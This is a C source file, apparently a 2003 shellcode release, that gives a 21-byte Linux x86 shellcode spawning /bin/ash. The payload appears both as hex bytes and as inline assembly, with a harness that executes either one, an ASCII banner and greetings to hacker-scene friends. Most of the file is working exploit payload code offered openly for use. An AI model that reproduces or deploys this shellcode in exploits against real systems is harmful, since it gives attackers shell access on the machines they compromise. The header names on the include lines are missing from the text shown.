/* * Fri Aug 29 16:29:38 CEST 2003 * * 21 byte execve("/bin/ash",0,0); shellcode for linux x86 * by zasta (zasta@darkircop.org) * * no assumptions should work under all circumstances * bash has problems with null argv so we use ash * * can be made shorter by cp /bin/ash ./a and fixing the push * well there are tons of ways to make shorter shellcodes * for example having /bin/ash\0 somewhere in memory and just "hardcoding" * the addr in ebx but this is just a generic example of a versatile * short shellcode * * * greetz: sorbo, #darkircop@irc.darkircop.org * daphiel & m00kie (hope your honeymoon was allright... male kids!!!) * hello to s0lar!! * * * have fun! * */ #include #include char shellcode[] = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68" "\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80"; void code() { __asm__(" xor %ecx,%ecx mul %ecx addb $0xb,%al push %edx push $0x6873612f push $0x6e69622f mov %esp,%ebx int $0x80 "); } /* lets l00k l33t w00t */ void banner() { printf("execve(\"/bin/ash\",0,0); shellcode %d bytes (short enough? ;)\n" "============================================================\n\n" " by\n" " _\n" " ______ _ ___| |_ __ _\n" " |_ / _` / __| __/ _` |\n" " / / (_| \\__ \\ || (_| |\n" " /___\\__,_|___/\\__\\__,_|\n" "\t\tzasta@darkricop.org\n\n" " the first italian hackgirl\n" " ph34r I own even acidburn\n\n\n" ,strlen(shellcode)); } int main(int argc, char *argv[]) { int opt; void (*ptr)() = (void(*)()) &shellcode[0]; while ((opt = getopt(argc, argv,"ahs")) != EOF) { switch(opt) { default: case 'h': printf( "Usage: %s \n" "-h\tThis lame message\n" "-a\tLaunch asm code\n" "-s\tLaunch hex code\n",argv[0]); exit(0); case 'a': banner(); code(); exit(0); /* unreach if all goes well */ case 's': banner(); (*ptr)(); exit(0); /* ditto */ } } /* default just launch our hex code */ banner(); (*ptr)(); exit(0); /* guess the comment */ }